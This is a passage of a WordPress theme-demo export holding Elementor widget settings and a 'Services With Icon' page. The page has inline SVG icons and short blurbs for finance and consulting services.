_inline_size":null},"elements":[{"id":"719b6b2","elType":"widget","settings":{"image_carousel":[{"_id":"e5f9d6d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"5966eb5","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"d89b073","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"6663b67","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"23bce51","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"70a824d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}}],"tshow":"6","tshow_tablet":"3","dots":"false","img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:10;}}s:8:"advanced";a:1:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:9:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:12:"stitle_color";i:2;s:29:"stitle_typography_font_weight";i:2;s:29:"stitle_typography_font_family";i:1;s:14:"subtitle_style";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:5;}s:14:"section_layout";a:2:{s:6:"layout";i:4;s:3:"gap";i:4;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:8:{s:21:"background_background";i:3;s:16:"background_color";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}}}}s:10:"iimage_box";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:8;s:4:"link";i:8;s:5:"title";i:7;s:3:"des";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:10:"radius_box";i:8;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:5:"align";i:1;s:12:"testi_slider";i:1;s:10:"dots_style";i:1;s:11:"arrow_align";i:1;}}s:5:"style";a:2:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}s:11:"style_tinfo";a:5:{s:9:"job_color";i:1;s:25:"job_typography_typography";i:1;s:26:"job_typography_font_family";i:1;s:24:"job_typography_font_size";i:1;s:26:"job_typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services With Icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/services-with-icon/</link>
		<pubDate>Fri, 11 Sep 2020 10:16:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=885</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
